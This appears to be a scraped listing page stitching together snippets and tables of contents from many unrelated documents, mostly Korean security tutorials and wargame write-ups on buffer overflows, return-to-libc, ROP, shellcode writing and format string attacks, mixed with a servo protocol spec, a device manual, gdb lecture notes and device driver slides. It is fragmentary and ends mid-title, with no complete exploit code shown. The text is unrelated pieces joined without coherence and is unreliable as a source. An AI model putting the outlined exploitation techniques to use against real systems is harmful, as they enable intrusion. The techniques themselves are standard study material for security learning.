Smashing the Lord Of the Bof Smashing the Lord Of the Bof cd80@leaveret 목차 0. LOB 소개 1. Gate -> gremlin 2. Gremlin -> cobolt 3. Cobolt -> goblin 4. Goblin -> orc 5. Orc -> wolfman 6. Wolfman-> darkelf 7. Darkelf -> orge 8. Orge ->

More information

Reusing Dynamic Linker For Exploitation Author : Date : 2012 / 05 / 13 Contact : Facebook : fb.me/kwonpwn

Reusing Dynamic Linker For Exploitation Author :  Date : 2012 / 05 / 13 Contact : Facebook : fb.me/kwonpwn Reusing Dynamic Linker For Exploitation Author : pwn3r @ B10S @WiseGuyz Date : 2012 / 05 / 13 Contact : austinkwon2@gmail.com Facebook : fb.me/kwonpwn3r Abstract 대부분의 Unix 에선공유라이브러리를메모리에로드하고프로그램과 link

More information

Return-to-libc

Return-to-libc Return-to-libc Mini (skyclad0x7b7@gmail.com) 2015-08-22 - INDEX - 1. 개요... - 2-1-1. 서문... - 2-1-2. RTL 공격이란... - 2 - 보호기법... - 3 - Libc 란?... - 4-2. RTL 공격... - 4-2-1. 취약한코드... - 4-2-2. 분석... - 5-2-3.

More information

History

History [Document Information] Title : History Of Buffer Over Flow VOL. 1 Date : 2007. 3. 28 Author : hardsoju Contact : E-Mail(hardsoju@hanmail.net) 1 [Index] 1. 개요 2. 환경변수의이해 2.1 eggshell 을이용한 root shell 획득

More information

Level 4 ( hell_fire -> evil_wizard ) ~]$ cat evil_wizard.c /* The Lord of the BOF : The Fellowship of the BOF - evil_wizard

Level 4 ( hell_fire -> evil_wizard ) ~]$ cat evil_wizard.c /* The Lord of the BOF : The Fellowship of the BOF - evil_wizard Level 4 ( hell_fire -> evil_wizard ) [hell_fire@fedora_1stfloor ~]$ cat evil_wizard.c /* The Lord of the BOF : The Fellowship of the BOF - evil_wizard - Local BOF on Fedora Core 3 - hint : GOT overwriting

More information

2015 CodeGate 풀이보고서 김성우 1. systemshock strcat(cmd, argv[1]); 에서스택버퍼오버플로우가발생합니다

2015 CodeGate 풀이보고서 김성우   1. systemshock strcat(cmd, argv[1]); 에서스택버퍼오버플로우가발생합니다 2015 CodeGate 풀이보고서 김성우 rkwk0112@gmail.com http://cd80.tistory.com 1. systemshock strcat(cmd, argv[1]); 에서스택버퍼오버플로우가발생합니다 argv[1] 의주소는스택에있으므로 cmd부터버퍼를오버플로우시켜 argv[1] 이저장된주소까지접근이가능하면 strlen(argv[1]); 시

More information

Microsoft Word - building the win32 shellcode 01.doc

Microsoft Word - building the win32 shellcode 01.doc Win32 Attack 1. Local Shellcode 작성방법 By 달고나 (Dalgona@wowhacker.org) Email: zinwon@gmail.com Abstract 이글은 MS Windows 환경에서 shellcode 를작성하는방법에대해서설명하고있다. Win32 는 *nix 환경과는사뭇다른 API 호출방식을사용하기때문에조금복잡하게둘러서 shellcode

More information

Contents 1. 목적 풀이 gate

Contents 1. 목적 풀이 gate Lord of Bof 풀이 Moomoo/badass4514@gmail.com 1 Contents 1. 목적 ---------------------------------------------------------------- 3 2. 풀이 gate ----------------------------------------------------------------

More information

강의10

강의10 Computer Programming gdb and awk 12 th Lecture 김현철컴퓨터공학부서울대학교 순서 C Compiler and Linker 보충 Static vs Shared Libraries ( 계속 ) gdb awk Q&A Shared vs Static Libraries ( 계속 ) Advantage of Using Libraries Reduced

More information

MODBUS SERVO DRIVER( FDA7000 Series ) STANDARD PROTOCOL (Ver 1.00) 1

MODBUS SERVO DRIVER( FDA7000 Series ) STANDARD PROTOCOL (Ver 1.00) 1 SERVO DRIVER( FDA7000 Series ) STANDARD PROTOCOL (Ver 100) 1 Contents 1 INTRODUCTION 2 PROTOCOL FRAME OUTLINE 3 FUNCTION FIELD 4 DATA FIELD 5 CRC CHECK 6 FUNCTION EXAM 7 EXCEPTION RESPONSE 8 I/O STATUS

More information

Poison null byte Excuse the ads! We need some help to keep our site up. List 1 Conditions 2 Exploit plan 2.1 chunksize(p)!= prev_size (next_chunk(p) 3

Poison null byte Excuse the ads! We need some help to keep our site up. List 1 Conditions 2 Exploit plan 2.1 chunksize(p)!= prev_size (next_chunk(p) 3 Poison null byte Excuse the ads! We need some help to keep our site up. List 1 Conditions 2 Exploit plan 2.1 chunksize(p)!= prev_size (next_chunk(p) 3 Example 3.1 Files 3.2 Source code 3.3 Exploit flow

More information

01.ROP(Return Oriented Programming)-x86 Excuse the ads! We need some help to keep our site up. List Return Oriented Programming(ROP) -x86 Gadgets - PO

01.ROP(Return Oriented Programming)-x86 Excuse the ads! We need some help to keep our site up. List Return Oriented Programming(ROP) -x86 Gadgets - PO 01.ROP(Return Oriented Programming)-x86 Excuse the ads! We need some help to keep our site up. List Return Oriented Programming(ROP) -x86 Gadgets - POP; POP; POP; RET PLT & GOT Debug Proof of concept Example

More information

Sena Technologies, Inc. HelloDevice Super 1.1.0

Sena Technologies, Inc. HelloDevice Super 1.1.0 HelloDevice Super 110 Copyright 1998-2005, All rights reserved HelloDevice 210 ()137-130 Tel: (02) 573-5422 Fax: (02) 573-7710 E-Mail: support@senacom Website: http://wwwsenacom Revision history Revision

More information

Microsoft Word - readme.doc

Microsoft Word - readme.doc ========================================================= 제 1 회광주과기원정보통신공학과 SW 경진대회 (Hacking 경진대회 ) 대회시작 : 2002 년 8 월 8 일 ( 목 ) 오후 9:00 ( 한국시간, GMT+9:00) 대회종료 : 2002 년 8 월 10 일 ( 토 ) 오후 9:00 ( 한국시간, GMT+9:00)

More information

INTRO Basic architecture of modern computers Basic and most used assembly instructions on x86 Installing an assembly compiler and RE tools Practice co

INTRO Basic architecture of modern computers Basic and most used assembly instructions on x86 Installing an assembly compiler and RE tools Practice co Basic reverse engineering on x86 This is for those who want to learn about basic reverse engineering on x86 (Feel free to use this, email me if you need a keynote version.) v0.1 SeungJin Beist Lee beist@grayhash.com

More information

Microsoft Word - FreeBSD Shellcode 만들기.docx

Microsoft Word - FreeBSD Shellcode 만들기.docx FreeBSD Shellcode 만들기 작성자 : graylynx (graylynx at gmail.com) 작성일 : 2007년 6월 21일 ( 마지막수정일 : 2007년 6월 21일 ) http://powerhacker.net 이문서는쉘코드를만드는데필요한모든내용을포함하고있지는않습니다. 이문서를읽어보시기전에간단한어셈블리명령어와 C 언어문법, 쉘코드에대한기초적인내용을미리습득하신다면더욱더쉽게이해할수있을겁니다

More information

RTL

RTL All about RTL ( Return To Library ) By Wr4ith [ 목차 ] 1. 개요 2. 등장배경 3. 실습 1. 개요 기존의시스템해킹기법중일부인 BoF/FSB 등은대부분직접만든쉘코드를이용 하여 root 권한을취득하는것이일반적이였다. 하지만 RTL 기법은쉘코드가필요 없는기법이다. RTL 의핵심은함수에필로그과정에서 RET 영역에 libc

More information

Computer Security Chapter 08. Format String 김동진 1 Secure Software Lab.

Computer Security Chapter 08. Format String 김동진   1 Secure Software Lab. Computer Security Chapter 08. Format Strig 김동진 (kdjorag@gmail.com) http://securesw.dakook.ac.kr/ 1 목차 Format Strig Attack? Format Strig? Format Strig Attack 의원리 입력코드생성 Format Strig Attack (kerel v2.2,

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 Web server porting 2 Jo, Heeseung Web 을이용한 LED 제어 Web 을이용한 LED 제어프로그램 web 에서데이터를전송받아타겟보드의 LED 를조작하는프로그램을작성하기위해다음과같은소스파일을생성 2 Web 을이용한 LED 제어 LED 제어프로그램작성 8bitled.html 파일을작성 root@ubuntu:/working/web# vi

More information

gdb 사용법 Debugging Debug라는말은 bug를없앤다는말이다. Bug란, 컴퓨터프로그램상의논리적오류를말하며, 이것을찾아해결하는과정이바로, debugging이다. 초기컴퓨터들은실제벌레가컴퓨터에들어가서오작동을일으키는경우가있었다고하며, 여기서 debug 이라는말이

gdb 사용법 Debugging Debug라는말은 bug를없앤다는말이다. Bug란, 컴퓨터프로그램상의논리적오류를말하며, 이것을찾아해결하는과정이바로, debugging이다. 초기컴퓨터들은실제벌레가컴퓨터에들어가서오작동을일으키는경우가있었다고하며, 여기서 debug 이라는말이 gdb 사용법 Debugging Debug라는말은 bug를없앤다는말이다. Bug란, 컴퓨터프로그램상의논리적오류를말하며, 이것을찾아해결하는과정이바로, debugging이다. 초기컴퓨터들은실제벌레가컴퓨터에들어가서오작동을일으키는경우가있었다고하며, 여기서 debug 이라는말이나왔다한다. Debugging을하는가장원초적방법은프로그램소스를눈으로따라가며, 머리로실행시켜논리적오류를찾아내는것이다.

More information

02.Create a shellcode that executes "/bin/sh" Excuse the ads! We need some help to keep our site up. List Create a shellcode that executes "/bin/sh" C

02.Create a shellcode that executes /bin/sh Excuse the ads! We need some help to keep our site up. List Create a shellcode that executes /bin/sh C 02.Create a shellcode that executes "/bin/sh" Excuse the ads! We need some help to keep our site up. List Create a shellcode that executes "/bin/sh" C language Assembly code Change permissions(seteuid())

More information

윤석언 - Buffer Overflow - 윤석언 제12회세미나 수원대학교보안동아리 FLAG

윤석언 - Buffer Overflow - 윤석언 제12회세미나 수원대학교보안동아리 FLAG - Buffer Overflow - 윤석언 SlaxCore@gmailcom 제12회세미나 수원대학교보안동아리 FLAG http://flagsuwonackr - 1 - < BOF(Buffer OverFlow) > - Stack 기반 - Heap 기반 # 기초 : Stack 기반의 BOF 스택 : 기본적으로 2개의 operation(push, pop) 과 1 개의변수(top)

More information

Fedora Core 3,4,5 stack overflow.docx

Fedora Core 3,4,5 stack overflow.docx Fedora Core 3,4,5 stack overflow - www.hackerschool.org - - by randomkid - +------------------------------ 목차 ----------------------------------+ 1. 스택오버플로우의역사 2. 커널 2.4 에서의 stack overflow 방법 (shellcode

More information

Microsoft PowerPoint - ch04_코드 보안 [호환 모드]

Microsoft PowerPoint - ch04_코드 보안 [호환 모드] 이장에서다룰내용 1 2 3 컴퓨터의기본구조를살펴본다. 기계어수준에서의프로그램동작을이해한다. 버퍼오버플로우와포맷스트링공격을알아본다. 정보보안개론 4 장 Section 01 시스템과프로그램에대한이해 Section 01 시스템과프로그램에대한이해 시스템메모리구조 프로그램을동작시키면메모리에프로그램이동작하기위한가상의메모리공간이생성되며, 이메모리공간은다시그목적에따라상위,

More information

Microsoft PowerPoint - ch04_코드 보안 [호환 모드]

Microsoft PowerPoint - ch04_코드 보안 [호환 모드] 정보보안개론 4 장 이장에서다룰내용 1 컴퓨터의기본구조를살펴본다. 2 기계어수준에서의프로그램동작을이해한다. 2 3 버퍼오버플로우와포맷스트링공격을알아본다. Section 01 시스템과프로그램에대한이해 v 시스템메모리구조 프로그램을동작시키면메모리에프로그램이동작하기위한가상의메모리공간이 생성되며, 이메모리공간은다시그목적에따라상위, 하위메모리로나뉨. 상위메모리 : 스택

More information

목 차 1. 개요 취약점분석추진배경 취약점요약 취약점정보 취약점대상시스템목록 분석 공격기법및기본개념 시나리오 공격코드

목 차 1. 개요 취약점분석추진배경 취약점요약 취약점정보 취약점대상시스템목록 분석 공격기법및기본개념 시나리오 공격코드 취약점분석보고서 [Aviosoft Digital TV Player Professional 1.x Stack Buffer Overflow] 2012-08-08 RedAlert Team 강동우 목 차 1. 개요... 1 1.1. 취약점분석추진배경... 1 1.2. 취약점요약... 1 1.3. 취약점정보... 1 1.4. 취약점대상시스템목록... 1 2. 분석...

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 7-Segment Device Control - Device driver Jo, Heeseung HBE-SM5-S4210 의 M3 Module 에는 6 자리를가지는 7-Segment 모듈이아래그림처럼실장 6 Digit 7-Segment 2 6-Digit 7-Segment LED controller 16비트로구성된 2개의레지스터에의해제어 SEG_Sel_Reg(Segment

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 7-Segment Device Control - Device driver Jo, Heeseung HBE-SM5-S4210 의 M3 Module 에는 6 자리를가지는 7-Segment 모듈이아래그림처럼실장 6 Digit 7-Segment 2 6-Digit 7-Segment LED Controller 16비트로구성된 2개의레지스터에의해제어 SEG_Sel_Reg(Segment

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 7-SEGMENT DEVICE CONTROL - DEVICE DRIVER Jo, Heeseung 디바이스드라이버구현 : 7-SEGMENT HBE-SM5-S4210 의 M3 Module 에는 6 자리를가지는 7-Segment 모듈이아래그림처럼실장 6 Digit 7-Segment 2 디바이스드라이버구현 : 7-SEGMENT 6-Digit 7-Segment LED

More information

버퍼오버플로우-왕기초편 10. 메모리를 Hex dump 뜨기 앞서우리는버퍼오버플로우로인해리턴어드레스 (return address) 가변조될수있음을알았습니다. 이제곧리턴어드레스를원하는값으로변경하는실습을해볼것인데요, 그전에앞서, 메모리에저장된값들을살펴보는방법에대해배워보겠습

버퍼오버플로우-왕기초편 10. 메모리를 Hex dump 뜨기 앞서우리는버퍼오버플로우로인해리턴어드레스 (return address) 가변조될수있음을알았습니다. 이제곧리턴어드레스를원하는값으로변경하는실습을해볼것인데요, 그전에앞서, 메모리에저장된값들을살펴보는방법에대해배워보겠습 앞서우리는버퍼오버플로우로인해리턴어드레스 (return address) 가변조될수있음을알았습니다. 이제곧리턴어드레스를원하는값으로변경하는실습을해볼것인데요, 그전에앞서, 메모리에저장된값들을살펴보는방법에대해배워보겠습니다. 여러분모두 Windows 에서 hex editor(hex dump, hex viewer) 라는것을사용해보셨을겁니다. 바로바이너리파일을 16 진수

More information

<52544CC0BB20BEC6B4C2B0A12E687770>

<52544CC0BB20BEC6B4C2B0A12E687770> RTL 을아는가? 작성일 : 2009/12/01 Written by MaJ3stY ----------------------------------------------------------------------- 목차 0x01 Notice 0x02 RTL 이란? 0x03 공격을직접해보자. 0x04 마치며 -----------------------------------------------------------------------

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 Web server porting 2 Jo, Heeseung Web 을이용한 LED 제어 Web 을이용한 LED 제어프로그램 web 에서데이터를전송받아타겟보드의 LED 를조작하는프로그램을작성하기위해다음과같은소스파일을생성 2 Web 을이용한 LED 제어 LED 제어프로그램작성 8bitled.html 파일을작성 root@ubuntu:/working/web# vi

More information

CKKeyPro 적용가이드

CKKeyPro 적용가이드 3.20 사이버테러악성코드분석보고서 라온시큐어보안기술연구팀 작성일 : 2013. 03 페이지 : 1/15 Introduction 2013년 3월 20일오후, MBC, KBS, YTN, 농협, 신한은행, 제주은행전산망장애가동시에발생하였다. 피해기관들의호스트약 500여대에오류메시지가화면에나타났으며악성코드에감염된호스트는사용할수없는상태가되었다. 현재까지정확한침투경로가밝혀지지않고있다.

More information

[8051] 강의자료.PDF

[8051] 강의자료.PDF CY AC F0 RS1 RS0 OV - P 0xFF 0x80 0x7F 0x30 0x2F 0x20 0x1F 0x18 0x17 0x10 0x0F 0x08 0x07 0x00 0x0000 0x0FFF 0x1000 0xFFFF 0x0000 0xFFFF RAM SFR SMOD - - - GF1 GF0 PD IDL 31 19 18 9 12 13 14 15 1 2 3 4

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 Chapter 05. 코드보안 : 코드속에뒷길을만드는기술 1. 시스템과프로그램에대한이해 2. 버퍼오버플로우공격 3. 포맷스트링공격 시스템메모리의구조 어떤프로그램을동작시키면메모리에프로그램이동작하기위한가상의메모리공간이생성됨. 그메모리공간은다시목적에따라상위메모리와하위메모리로나눔. [ 그림 5-2] 메모리의기본구조 스택영역과힙영역 상위메모리 : 스택 (Stack)

More information

6주차.key

6주차.key 6, Process concept A program in execution Program code PCB (process control block) Program counter, registers, etc. Stack Heap Data section => global variable Process in memory Process state New Running

More information

Microsoft PowerPoint - a10.ppt [호환 모드]

Microsoft PowerPoint - a10.ppt [호환 모드] Structure Chapter 10: Structures t and Macros Structure 관련된변수들의그룹으로이루어진자료구조 template, pattern field structure를구성하는변수 (cf) C언어의 struct 프로그램의 structure 접근 entire structure 또는 individual fields Structure는

More information

< E20C6DFBFFEBEEE20C0DBBCBAC0BB20C0A7C7D12043BEF0BEEE20492E707074>

< E20C6DFBFFEBEEE20C0DBBCBAC0BB20C0A7C7D12043BEF0BEEE20492E707074> Chap #2 펌웨어작성을위한 C 언어 I http://www.smartdisplay.co.kr 강의계획 Chap1. 강의계획및디지털논리이론 Chap2. 펌웨어작성을위한 C 언어 I Chap3. 펌웨어작성을위한 C 언어 II Chap4. AT89S52 메모리구조 Chap5. SD-52 보드구성과코드메모리프로그래밍방법 Chap6. 어드레스디코딩 ( 매핑 ) 과어셈블리어코딩방법

More information

목차 1. 소개... 3 가. BOF란?... 3 나. 윈도우 BOF 개발환경및사용툴 Shellcode 작성하기... 4 가. cmd 쉘 ) 소스코드작성 ) 디스어셈블리 ) 어셈블리코드편집 간단

목차 1. 소개... 3 가. BOF란?... 3 나. 윈도우 BOF 개발환경및사용툴 Shellcode 작성하기... 4 가. cmd 쉘 ) 소스코드작성 ) 디스어셈블리 ) 어셈블리코드편집 간단 기술문서 `09. 11. 02. 작성 Windows Buffer Overflow Attack 작성자 : 영남대학교정보보호연구학회 @Xpert 김슬예나 prehea@ynu.ac.kr 1 목차 1. 소개... 3 가. BOF란?... 3 나. 윈도우 BOF... 3 2. 개발환경및사용툴... 3 3. Shellcode 작성하기... 4 가. cmd 쉘... 4

More information

Cogame 취약점 보고

Cogame 취약점 보고 Frist Version: 2006. 01. 07 Last Version: 2006. 01. 19 anesra@{null2root.org, gmail.com Table of Contents 1. 기본개념과도구...3 1.1 윈도우쉘코드... 3 1.2 윈도우메모리 LAYOUT... 4 1.3 레지스터... 4 1.4 기본어셈블리어명령어... 4 2. 쉘코드만들기...6

More information

Microsoft Word - Reverse Engineering Code with IDA Pro-2-1.doc

Microsoft Word - Reverse Engineering Code with IDA Pro-2-1.doc Reverse Engineering Code with IDA Pro By Dan Kaminsky, Justin Ferguson, Jason Larsen, Luis Miras, Walter Pearce 정리 : vangelis(securityproof@gmail.com) 이글은 Reverse Engineering Code with IDA Pro(2008년출판

More information

01.The basics technic of Shellcode Excuse the ads! We need some help to keep our site up. List Shellcode The basics of shellcode(ubuntu-16.04) C ASM M

01.The basics technic of Shellcode Excuse the ads! We need some help to keep our site up. List Shellcode The basics of shellcode(ubuntu-16.04) C ASM M 01.The basics technic of Shellcode Excuse the ads! We need some help to keep our site up. List Shellcode The basics of shellcode(ubuntu-16.04) C ASM Machine code Assembly code Linux system call in assembly

More information

Eureka Mail Client_v2.2.q를이용하여오믈렛에그헌팅에대하여알아볼것이다. 익스플로잇을위해구성된환경은아래와같다. - Windows XP Professional SP3 KOR - Python Ollydbg 1.x, Immunity Debugg

Eureka Mail Client_v2.2.q를이용하여오믈렛에그헌팅에대하여알아볼것이다. 익스플로잇을위해구성된환경은아래와같다. - Windows XP Professional SP3 KOR - Python Ollydbg 1.x, Immunity Debugg 익스플로잇실습 / 튜토리얼 Eureka Mail Client 2.2q Omelet Egg Hunting By WraithOfGhost Eureka Mail Client_v2.2.q를이용하여오믈렛에그헌팅에대하여알아볼것이다. 익스플로잇을위해구성된환경은아래와같다. - Windows XP Professional SP3 KOR - Python 2.7.10 - Ollydbg

More information

vi 사용법

vi 사용법 유닉스프로그래밍및실습 gdb 사용법 fprintf 이용 단순디버깅 확인하고자하는코드부분에 fprintf(stderr, ) 를이용하여그지점까지도달했는지여부와관심있는변수의값을확인 여러유형의단순한문제를확인할수있음 그러나자세히살펴보기위해서는디버깅툴필요 int main(void) { int count; long large_no; double real_no; init_vars();

More information

Remote Buffer Overflow & Format String 2012 년 8 월 6 일월요일 오후 6:32 ================================================================ Title: Remote Buffer

Remote Buffer Overflow & Format String 2012 년 8 월 6 일월요일 오후 6:32 ================================================================ Title: Remote Buffer Remote Buffer Overflow & Format String 2012 년 8 월 6 일월요일 오후 6:32 ================================================================ Title: Remote Buffer Overflow & Format String :-) Author : 유동훈 (Xpl017Elz)

More information

Smashing The Stack For Fun And Profit by Aleph One

Smashing The Stack For Fun And Profit by Aleph One Review of Aleph One s Smashing The Stack For Fun And Profit by vangelis(vangelis@wowsecurity.org) 888 888 888 888 888 888 888 888 888.d88b. 888 888 888 88888b. 8888b..d8888b 888 888.d88b. 888d888 888 888

More information

BufferOverflow on Solaris Sparc

BufferOverflow on Solaris Sparc BufferOverflow on Solaris Sparc by Tyger (nobody4@empal.com) 1. 서문이문서에서는 Solaris Sparc에서의버퍼오버플로우에대해다룰것이다. 버퍼오버플로우에대한개념은이미알고있는걸로간주하고, Intel x86에서의버퍼오버플로우와차이점에중점을두고설명한다. 참고로 Sparc 머신이없어서아래의환경에서만테스트한것이므로다른환경에선이내용과다른결과가나올수도있다.

More information

<B1E2BCFAB9AEBCAD5FB9DABAB4B1D45F F F64746F72732E687770>

<B1E2BCFAB9AEBCAD5FB9DABAB4B1D45F F F64746F72732E687770> 기술문서 09. 11. 3. 작성 Format String Bug 에서 dtors 우회 작성자 : 영남대학교 @Xpert 박병규 preex@ynu.ac.kr 1. 요약... 2 2. d to r 이란... 3 3. 포맷스트링... 4 4. ro o t 권한획득... 7 5. 참고자료... 1 0-1 - 1. 요약 포맷스트링버그 (Format String bug)

More information

lecture4(6.범용IO).hwp

lecture4(6.범용IO).hwp 제 2 부 C-언어를 사용한 마이크로컨트롤러 활용기초 66 C-언어는 수학계산을 위해 개발된 FORTRAN 같은 고급언어들과는 달 리 Unix 운영체제를 개발하면서 같이 개발된 고급언어이다. 운영체제의 특성상 C-언어는 다른 고급언어에 비해 컴퓨터의 하드웨어를 직접 제어할 수 있는 능력이 탁월하여 마이크로프로세서의 프로그램에 있어서 어셈블 리와 더불어 가장

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 KeyPad Device Control - Device driver Jo, Heeseung HBE-SM5-S4210 에는 16 개의 Tack Switch 를사용하여 4 행 4 열의 Keypad 가장착 4x4 Keypad 2 KeyPad 를제어하기위하여 FPGA 내부에 KeyPad controller 가구현 KeyPad controller 16bit 로구성된

More information

08.BROP(Blind Return Oriented Programming) Excuse the ads! We need some help to keep our site up. List BROP(Blind Return Oriented Programming) BROP st

08.BROP(Blind Return Oriented Programming) Excuse the ads! We need some help to keep our site up. List BROP(Blind Return Oriented Programming) BROP st 08.BROP(Blind Return Oriented Programming) Excuse the ads! We need some help to keep our site up. List BROP(Blind Return Oriented Programming) BROP struct Find BROP Proof of concept Example code Test server

More information

IT CookBook, 정보보안개론 ( 개정판 ) [ 강의교안이용안내 ] 본강의교안의저작권은한빛아카데미 에있습니다. 이자료를무단으로전제하거나배포할경우저작권법 136 조에의거하여최고 5 년이하의징역또는 5 천만원이하의벌금에처할수있고이를병과 ( 倂科 ) 할수도있습니다.

IT CookBook, 정보보안개론 ( 개정판 ) [ 강의교안이용안내 ] 본강의교안의저작권은한빛아카데미 에있습니다. 이자료를무단으로전제하거나배포할경우저작권법 136 조에의거하여최고 5 년이하의징역또는 5 천만원이하의벌금에처할수있고이를병과 ( 倂科 ) 할수도있습니다. IT CookBook, 정보보안개론 ( 개정판 ) [ 강의교안이용안내 ] 본강의교안의저작권은한빛아카데미 에있습니다. 이자료를무단으로전제하거나배포할경우저작권법 136 조에의거하여최고 5 년이하의징역또는 5 천만원이하의벌금에처할수있고이를병과 ( 倂科 ) 할수도있습니다. Chapter 05. 코드보안 : 코드속에뒷길을만드는기술 1. 시스템과프로그램에대한이해 2.

More information

제 14 장포인터활용 유준범 (JUNBEOM YOO) Ver 본강의자료는생능출판사의 PPT 강의자료 를기반으로제작되었습니다.

제 14 장포인터활용 유준범 (JUNBEOM YOO) Ver 본강의자료는생능출판사의 PPT 강의자료 를기반으로제작되었습니다. 제 14 장포인터활용 유준범 (JUNBEOM YOO) Ver. 2.0 jbyoo@konkuk.ac.kr http://dslab.konkuk.ac.kr 본강의자료는생능출판사의 PPT 강의자료 를기반으로제작되었습니다. 이번장에서학습할내용 이중포인터란무엇인가? 포인터배열 함수포인터 다차원배열과포인터 void 포인터 포인터는다양한용도로유용하게활용될수있습니다. 2 이중포인터

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 @ Lesson 3 if, if else, if else if, switch case for, while, do while break, continue : System.in, args, JOptionPane for (,, ) @ vs. logic data method variable Data Data Flow (Type), ( ) @ Member field

More information

제1장 Unix란 무엇인가?

제1장  Unix란 무엇인가? 1 12 장파이프 2 12.1 파이프 파이프원리 $ who sort 파이프 3 물을보내는수도파이프와비슷 한프로세스는쓰기용파일디스크립터를이용하여파이프에데이터를보내고 ( 쓰고 ) 다른프로세스는읽기용파일디스크립터를이용하여그파이프에서데이터를받는다 ( 읽는다 ). 한방향 (one way) 통신 파이프생성 파이프는두개의파일디스크립터를갖는다. 하나는쓰기용이고다른하나는읽기용이다.

More information

untitled

untitled Step Motor Device Driver Embedded System Lab. II Step Motor Step Motor Step Motor source Embedded System Lab. II 2 open loop, : : Pulse, 1 Pulse,, -, 1 +5%, step Step Motor (2),, Embedded System Lab. II

More information

익스플로잇실습 / 튜토리얼 Easy RM to MP3 Converter ROP [ Direct RET VirtualProtect() 함수사용 ] By WraithOfGhost

익스플로잇실습 / 튜토리얼 Easy RM to MP3 Converter ROP [ Direct RET VirtualProtect() 함수사용 ] By WraithOfGhost 익스플로잇실습 / 튜토리얼 Easy RM to MP3 Converter 2.7.3 ROP [ Direct RET VirtualProtect() 함수사용 ] By WraithOfGhost Easy RM to MP3 Converter_v2.7.3을이용하여 ROP 공격에대하여알아볼것이다. 익스플로잇을위해구성된환경은아래와같다. - Windows XP Professional

More information

슬라이드 1

슬라이드 1 / 유닉스시스템개요 / 파일 / 프로세스 01 File Descriptor file file descriptor file type unix 에서의파일은단지바이트들의나열임 operating system 은파일에어떤포맷도부과하지않음 파일의내용은바이트단위로주소를줄수있음 file descriptor 는 0 이나양수임 file 은 open 이나 creat 로 file

More information

UDCSC Hacking Festival 2005

UDCSC Hacking Festival 2005 UDCSC Hacking Festival 2005 작성자 : 유동훈 목차 0x00: 소개인사 0x01: Level1 문제 0x02: Level2 문제 0x03: Level3 문제 0x04: Level4 문제 0x05: Level5 문제 0x06: Level6 문제 0x07: 후기 0x00: 소개인사 안녕하세요. 이렇게만나뵙게되어서반갑습니다. 이번이벤트를주최해주신여러분들께진심으로감사드리는바입니다.

More information

À©µµ³×Æ®¿÷ÇÁ·Î±×·¡¹Ö4Àå_ÃÖÁ¾

À©µµ³×Æ®¿÷ÇÁ·Î±×·¡¹Ö4Àå_ÃÖÁ¾ P a 02 r t Chapter 4 TCP Chapter 5 Chapter 6 UDP Chapter 7 Chapter 8 GUI C h a p t e r 04 TCP 1 3 1 2 3 TCP TCP TCP [ 4 2] listen connect send accept recv send recv [ 4 1] PC Internet Explorer HTTP HTTP

More information

Microsoft PowerPoint - a8a.ppt [호환 모드]

Microsoft PowerPoint - a8a.ppt [호환 모드] 이장의내용 8 장고급프로시저 스택프레임 재귀 (Recursion) Invoke, Addr, Proc, Proto 디렉티브 다중모듈프로그램작성 2 8.2 스택프레임 Stack Frame ( 또는 activation record) procedure 의다음사항을저장한 영역 urn address passed parameter ( 스택매개변수 ) saved register

More information

Execute_Shellcode_on_the_MacOSX.txt - 메모장

Execute_Shellcode_on_the_MacOSX.txt - 메모장 ####################################################################### Execute Shellcode on the MacOSX 1ndr4 "indra.kr". " x40". "gmail.com" http://indra.linuxstudy.pe.kr 2005. 08. 19. ########################################################################

More information

chap7.key

chap7.key 1 7 C 2 7.1 C (System Calls) Unix UNIX man Section 2 C. C (Library Functions) C 1975 Dennis Ritchie ANSI C Standard Library 3 (system call). 4 C?... 5 C (text file), C. (binary file). 6 C 1. : fopen( )

More information

Microsoft PowerPoint - polling.pptx

Microsoft PowerPoint - polling.pptx 지현석 (binish@home.cnu.ac.kr) http://binish.or.kr Index 이슈화된키보드해킹 최근키보드해킹이슈의배경지식 Interrupt VS polling What is polling? Polling pseudo code Polling 을이용한키로거분석 방어기법연구 이슈화된키보드해킹 키보드해킹은연일상한가! 주식, 펀드투자의시기?! 최근키보드해킹이슈의배경지식

More information

(Asynchronous Mode) ( 1, 5~8, 1~2) & (Parity) 1 ; * S erial Port (BIOS INT 14H) - 1 -

(Asynchronous Mode) ( 1, 5~8, 1~2) & (Parity) 1 ; * S erial Port (BIOS INT 14H) - 1 - (Asynchronous Mode) - - - ( 1, 5~8, 1~2) & (Parity) 1 ; * S erial Port (BIOS INT 14H) - 1 - UART (Univ ers al As y nchronous Receiver / T rans mitter) 8250A 8250A { COM1(3F8H). - Line Control Register

More information

/chroot/lib/ /chroot/etc/

/chroot/lib/ /chroot/etc/ 구축 환경 VirtualBox - Fedora 15 (kernel : 2.6.40.4-5.fc15.i686.PAE) 작동 원리 chroot유저 ssh 접속 -> 접속유저의 홈디렉토리 밑.ssh의 rc 파일 실행 -> daemonstart실행 -> daemon 작동 -> 접속 유저만의 Jail 디렉토리 생성 -> 접속 유저의.bashrc 의 chroot 명령어

More information

歯7장.PDF

歯7장.PDF 7 Hello!! C 2 . 3 ([] ) < > [ ]; int array[10]; < > [ ][ ]; int array [3] [5]; 4 < > [ ]={ x1,,x10} ( ); (,). ({}). : int array[10]={1,2,3,4,5,6,7,8,9,10}; (" "). : char array[7]="turbo-c"; 5 int array[2][3]={{1,2},{3,4},{5,6}};

More information

untitled

untitled int i = 10; char c = 69; float f = 12.3; int i = 10; char c = 69; float f = 12.3; printf("i : %u\n", &i); // i printf("c : %u\n", &c); // c printf("f : %u\n", &f); // f return 0; i : 1245024 c : 1245015

More information

chap7.PDF

chap7.PDF 7 Hello!! C 2 . 3 ([] ) < > [ ]; int array[10]; < > [ ][ ]; int array [3] [5]; 4 < > [ ]={ x1,,x10} ( ); (,). ({}). : int array[10]={1,2,3,4,5,6,7,8,9,10}; (" "). : char array[7]="turbo-c"; 5 int array[2][3]={{1,2},{3,4},{5,6}};

More information

<4D F736F F F696E74202D20B8B6C0CCC5A9B7CEC7C1B7CEBCBCBCAD202839C1D6C2F7207E203135C1D6C2F >

